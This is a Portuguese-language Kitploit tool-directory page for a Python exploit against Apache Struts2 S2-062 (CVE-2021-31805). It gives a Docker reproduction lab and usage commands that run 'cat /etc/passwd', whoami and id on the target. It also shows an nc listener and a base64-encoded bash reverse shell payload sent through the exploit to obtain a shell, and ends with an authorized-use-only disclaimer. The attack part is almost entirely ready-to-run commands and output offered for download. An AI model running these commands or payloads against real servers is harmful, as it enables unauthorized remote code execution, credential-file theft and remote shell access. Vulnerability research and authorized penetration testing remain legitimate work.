Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Struts2_S2-062_CVE-2021-31805 — Exploit em Python para execução remota de código no Apache Struts2 S2-062 (CVE-2021-31805), com ambiente de reprodução baseado em Docker e geração de payload de reverse shell. | Kitploit
Ferramentas/GitHubGitHub/secnn/struts2_s2-062_cve-2021-31805
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubsecnn/struts2_s2-062_cve-2021-31805

Struts2_S2-062_CVE-2021-31805

Exploit em Python para execução remota de código no Apache Struts2 S2-062 (CVE-2021-31805), com ambiente de reprodução baseado em Docker e geração de payload de reverse shell.

Ver Repositório
115há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Struts2_S2-062_CVE-2021-31805

Apache Struts2 S2-062 vulnerabilidade de execução remota de código (CVE-2021-31805) | Reverse Shell

Ambiente de reprodução da vulnerabilidade

docker-compose.yml

root@kitploit:~
version: '2'
services:
 struts2:
   image: vulhub/struts2:2.5.25
   ports:
    - "8080:8080"

Puxar a imagem e iniciar o ambiente

root@kitploit:~
docker-compose up -d

Endereço de acesso: http://1.1.1.1:8080

Script de verificação da vulnerabilidade

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action "cat /etc/passwd"

passwd

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action whoami

root

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action id

id

Reverse Shell

NC abrir escuta de porta

root@kitploit:~
nc -lvvp 8081

NC

Construir script de reverse shell codificado em base64, usando o seguinte site para gerar: https://ir0ny.top/pentest/reverse-encoder-shell.html base64

Obter Shell

root@kitploit:~
python CVE-2021-31805_Shell.py http://1.1.1.1:8080/index.action "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}"

shell

Shell obtido com sucesso

Shell_code

Aviso de isenção de responsabilidade

Não use para fins ilegais, apenas para testes de segurança, caso contrário, as consequências não têm relação com este projeto. Nota: teste o site somente com autorização legítima: invadir sites de forma irregular, lágrimas para a família em dobro.

Baixar ferramenta